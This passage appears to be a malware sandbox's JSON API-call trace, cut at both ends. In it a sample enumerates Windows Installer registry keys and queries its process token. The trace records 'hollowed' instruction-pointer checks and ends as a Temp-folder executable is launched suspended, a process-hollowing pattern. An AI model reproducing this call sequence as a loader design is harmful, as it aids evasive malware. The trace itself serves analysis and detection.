"0\\xa7\\x18\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00\\x90\\xa7\\x18\\x00\\x00\\x00\\x00\\x00\\x97\\xa7\\x18\\x00\"\r\\xc6r\\xb4\\xa7\\x18\\x00\\xa8\\xa7\\x18\\x00H\\x00\\x00\\x00\\xb0\\xae\\x18\\x00\\xcc\\xbeUs" } ], "repeated": 0, "id": 1097 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000384" } ], "repeated": 0, "id": 1098 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000003", "pretty_value": "HKEY_USERS" }, { "name": "SubKey", "value": "S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products" }, { "name": "Handle", "value": "0x00000384" }, { "name": "FullName", "value": "HKEY_USERS\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products" } ], "repeated": 0, "id": 1099 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x00000384" }, { "name": "SubKey", "value": "671B50879509DB54C8A4B5E90B2C3C78" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Installer\\Products\\671B50879509DB54C8A4B5E90B2C3C78" } ], "repeated": 0, "id": 1100 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000384" } ], "repeated": 0, "id": 1101 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000380" } ], "repeated": 0, "id": 1102 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000380" } ], "repeated": 0, "id": 1103 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "\\x18\\x95\\x18\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00x\\x95\\x18\\x00\\x00\\x00\\x00\\x00\\x7f\\x95\\x18\\x00\"\r\\xc6r\\x9c\\x95\\x18\\x00\\x90\\x95\\x18\\x00H\\x00\\x00\\x00\\xa4\\x9e\\x18\\x00\\xcc\\xbeUs" } ], "repeated": 0, "id": 1104 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000380" } ], "repeated": 0, "id": 1105 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products\\671B50879509DB54C8A4B5E90B2C3C78" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products\\671B50879509DB54C8A4B5E90B2C3C78" } ], "repeated": 0, "id": 1106 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000380" } ], "repeated": 0, "id": 1107 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "\\x18\\x95\\x18\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00x\\x95\\x18\\x00\\x00\\x00\\x00\\x00\\x7f\\x95\\x18\\x00\"\r\\xc6r\\x9c\\x95\\x18\\x00\\x90\\x95\\x18\\x00H\\x00\\x00\\x00\\xa4\\x9e\\x18\\x00\\xcc\\xbeUs" } ], "repeated": 0, "id": 1108 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000380" } ], "repeated": 0, "id": 1109 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x80000003", "pretty_value": "HKEY_USERS" }, { "name": "SubKey", "value": "S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products\\671B50879509DB54C8A4B5E90B2C3C78" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_USERS\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products\\671B50879509DB54C8A4B5E90B2C3C78" } ], "repeated": 0, "id": 1110 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Classes\\Installer\\Products\\671B50879509DB54C8A4B5E90B2C3C78" }, { "name": "Handle", "value": "0x00000380" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Classes\\Installer\\Products\\671B50879509DB54C8A4B5E90B2C3C78" } ], "repeated": 0, "id": 1111 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000380" } ], "repeated": 0, "id": 1112 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-18\\Products\\671B50879509DB54C8A4B5E90B2C3C78\\InstallProperties" }, { "name": "Handle", "value": "0x00000380" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-18\\Products\\671B50879509DB54C8A4B5E90B2C3C78\\InstallProperties" } ], "repeated": 0, "id": 1113 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "registry", "api": "RegQueryValueExA", "status": false, "return": "0x000000ea", "arguments": [ { "name": "Handle", "value": "0x00000380" }, { "name": "ValueName", "value": "Publisher" }, { "name": "Type", "value": "0x00000001", "pretty_value": "REG_SZ" }, { "name": "DataLength", "value": "27" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-18\\Products\\671B50879509DB54C8A4B5E90B2C3C78\\InstallProperties\\Publisher" } ], "repeated": 0, "id": 1114 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000380" } ], "repeated": 0, "id": 1115 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Classes\\Installer\\Products" }, { "name": "Handle", "value": "0x00000380" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Classes\\Installer\\Products" } ], "repeated": 0, "id": 1116 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "registry", "api": "RegEnumKeyExA", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000380" }, { "name": "Index", "value": "2" }, { "name": "Name", "value": "910A08ADB3C4AAD4CA1A96737DACFAE9" }, { "name": "Class", "value": "" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\Installer\\Products\\910A08ADB3C4AAD4CA1A96737DACFAE9" } ], "repeated": 0, "id": 1117 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000384" } ], "repeated": 0, "id": 1118 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "0\\xa7\\x18\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00\\x90\\xa7\\x18\\x00\\x00\\x00\\x00\\x00\\x97\\xa7\\x18\\x00\"\r\\xc6r\\xb4\\xa7\\x18\\x00\\xa8\\xa7\\x18\\x00H\\x00\\x00\\x00p\\xb5\\x1cw\\x80\\x00\\x00\\x00" } ], "repeated": 0, "id": 1119 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000384" } ], "repeated": 0, "id": 1120 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products" } ], "repeated": 0, "id": 1121 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000384" } ], "repeated": 0, "id": 1122 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "0\\xa7\\x18\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00\\x90\\xa7\\x18\\x00\\x00\\x00\\x00\\x00\\x97\\xa7\\x18\\x00\"\r\\xc6r\\xb4\\xa7\\x18\\x00\\xa8\\xa7\\x18\\x00H\\x00\\x00\\x00\\xb0\\xae\\x18\\x00\\xcc\\xbeUs" } ], "repeated": 0, "id": 1123 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000384" } ], "repeated": 0, "id": 1124 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000003", "pretty_value": "HKEY_USERS" }, { "name": "SubKey", "value": "S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products" }, { "name": "Handle", "value": "0x00000384" }, { "name": "FullName", "value": "HKEY_USERS\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products" } ], "repeated": 0, "id": 1125 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x00000384" }, { "name": "SubKey", "value": "910A08ADB3C4AAD4CA1A96737DACFAE9" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Installer\\Products\\910A08ADB3C4AAD4CA1A96737DACFAE9" } ], "repeated": 0, "id": 1126 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000384" } ], "repeated": 0, "id": 1127 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000380" } ], "repeated": 0, "id": 1128 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000380" } ], "repeated": 0, "id": 1129 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "\\x18\\x95\\x18\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00x\\x95\\x18\\x00\\x00\\x00\\x00\\x00\\x7f\\x95\\x18\\x00\"\r\\xc6r\\x9c\\x95\\x18\\x00\\x90\\x95\\x18\\x00H\\x00\\x00\\x00\\xa4\\x9e\\x18\\x00\\xcc\\xbeUs" } ], "repeated": 0, "id": 1130 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000380" } ], "repeated": 0, "id": 1131 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products\\910A08ADB3C4AAD4CA1A96737DACFAE9" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products\\910A08ADB3C4AAD4CA1A96737DACFAE9" } ], "repeated": 0, "id": 1132 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000380" } ], "repeated": 0, "id": 1133 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "\\x18\\x95\\x18\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00x\\x95\\x18\\x00\\x00\\x00\\x00\\x00\\x7f\\x95\\x18\\x00\"\r\\xc6r\\x9c\\x95\\x18\\x00\\x90\\x95\\x18\\x00H\\x00\\x00\\x00\\xa4\\x9e\\x18\\x00\\xcc\\xbeUs" } ], "repeated": 0, "id": 1134 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000380" } ], "repeated": 0, "id": 1135 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x80000003", "pretty_value": "HKEY_USERS" }, { "name": "SubKey", "value": "S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products\\910A08ADB3C4AAD4CA1A96737DACFAE9" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_USERS\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products\\910A08ADB3C4AAD4CA1A96737DACFAE9" } ], "repeated": 0, "id": 1136 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Classes\\Installer\\Products\\910A08ADB3C4AAD4CA1A96737DACFAE9" }, { "name": "Handle", "value": "0x00000380" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Classes\\Installer\\Products\\910A08ADB3C4AAD4CA1A96737DACFAE9" } ], "repeated": 0, "id": 1137 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000380" } ], "repeated": 0, "id": 1138 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-18\\Products\\910A08ADB3C4AAD4CA1A96737DACFAE9\\InstallProperties" }, { "name": "Handle", "value": "0x00000380" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-18\\Products\\910A08ADB3C4AAD4CA1A96737DACFAE9\\InstallProperties" } ], "repeated": 0, "id": 1139 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "registry", "api": "RegQueryValueExA", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000380" }, { "name": "ValueName", "value": "Publisher" }, { "name": "Data", "value": "Microsoft Corporation" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-18\\Products\\910A08ADB3C4AAD4CA1A96737DACFAE9\\InstallProperties\\Publisher" } ], "repeated": 0, "id": 1140 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000380" } ], "repeated": 0, "id": 1141 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Classes\\Installer\\Products" }, { "name": "Handle", "value": "0x00000380" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Classes\\Installer\\Products" } ], "repeated": 0, "id": 1142 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "registry", "api": "RegEnumKeyExA", "status": false, "return": "0x00000103", "pretty_return": "NO_MORE_ITEMS", "arguments": [ { "name": "Handle", "value": "0x00000380" }, { "name": "Index", "value": "3" }, { "name": "Name", "value": "" }, { "name": "Class", "value": "" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\Installer\\Products\\" } ], "repeated": 0, "id": 1143 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000380" } ], "repeated": 0, "id": 1144 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x0241cf9e", "parentcaller": "0x0041224a", "category": "threading", "api": "NtGetContextThread", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadHandle", "value": "0xfffffffe" }, { "name": "HollowedInstructionPointer", "value": "0x00000000" }, { "name": "CurrentInstructionPointer", "value": "0x00000000" }, { "name": "ProcessId", "value": "9224" } ], "repeated": 0, "id": 1145 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x0241d45a", "parentcaller": "0x0041224a", "category": "services", "api": "OpenSCManagerA", "status": true, "return": "0x0073efc0", "arguments": [ { "name": "MachineName", "value": "" }, { "name": "DatabaseName", "value": "" }, { "name": "DesiredAccess", "value": "0x00000004", "pretty_value": "SC_MANAGER_ENUMERATE_SERVICE" } ], "repeated": 0, "id": 1146 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x0241cf9e", "parentcaller": "0x0041224a", "category": "threading", "api": "NtGetContextThread", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadHandle", "value": "0xfffffffe" }, { "name": "HollowedInstructionPointer", "value": "0x00000000" }, { "name": "CurrentInstructionPointer", "value": "0x00000000" }, { "name": "ProcessId", "value": "9224" } ], "repeated": 0, "id": 1147 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x0241d45a", "parentcaller": "0x0041224a", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 1148 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x0241cf9e", "parentcaller": "0x0041224a", "category": "threading", "api": "NtGetContextThread", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadHandle", "value": "0xfffffffe" }, { "name": "HollowedInstructionPointer", "value": "0x00000000" }, { "name": "CurrentInstructionPointer", "value": "0x00000000" }, { "name": "ProcessId", "value": "9224" } ], "repeated": 1, "id": 1149 }, { "timestamp": "2025-02-27 23:34:18,050", "thread_id": "3892", "caller": "0x0241d45a", "parentcaller": "0x0041224a", "category": "process", "api": "NtCreateUserProcess", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0x00000388" }, { "name": "ThreadHandle", "value": "0x00000384" }, { "name": "ProcessDesiredAccess", "value": "0x02000000" }, { "name": "ThreadDesiredAccess", "value": "0x02000000" }, { "name": "ProcessFileName", "value": "" }, { "name": "ThreadName", "value": "" }, { "name": "ImagePathName", "value": "C:\\Users\\pacop\\AppData\\Local\\Temp\\f1ffd3c13b7bd7f498e8.exe" }, { "name": "CommandLine", "value": "\"C:\\Users\\pacop\\AppData\\Local\\Temp\\f1ffd3c13b7bd7f498e8.exe\" " }, { "name": "ProcessId", "value": "3552" } ], "repeated": 0, "id": 1150 }, { "timestamp": "2025-02-27 23:34:18,066", "thread_id": "3892", "caller": "0x0241d45a", "parentcaller": "0x0041224a", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "ntdll.dll" }, { "name": "BaseAddress", "value": "0x77150000" } ], "repeated": 0, "id": 1151 }, { "timestamp": "2025-02-27 23:34:18,066", "thread_id": "3892", "caller": "0x0241d45a", "parentcaller": "0x0041224a", "category": "__notification__", "api": "sysenter", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadIdentifier", "value": "3892" }, { "name": "Module", "value": "KERNELBASE.dll" }, { "name": "Return Address", "value": "0x76518e3c" } ], "repeated": 0, "id": 1152 }, { "timestamp": "2025-02-27 23:34:18,066", "thread_id": "3892", "caller": "0x0241d45a", "parentcaller": "0x0041224a", "category": "process", "api": "CreateProcessInternalW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ApplicationName", "value": "C:\\Users\\pacop\\AppData\\Local\\Temp\\f1ffd3c13b7bd7f498e8.exe" }, { "name": "CommandLine", "value": "\"C:\\Users\\pacop\\AppData\\Local\\Temp\\f1ffd3c13b7bd7f498e8.exe\" " }, { "name": "CreationFlags", "value": "0x00000004", "pretty_value": "CREATE_SUSPENDED" 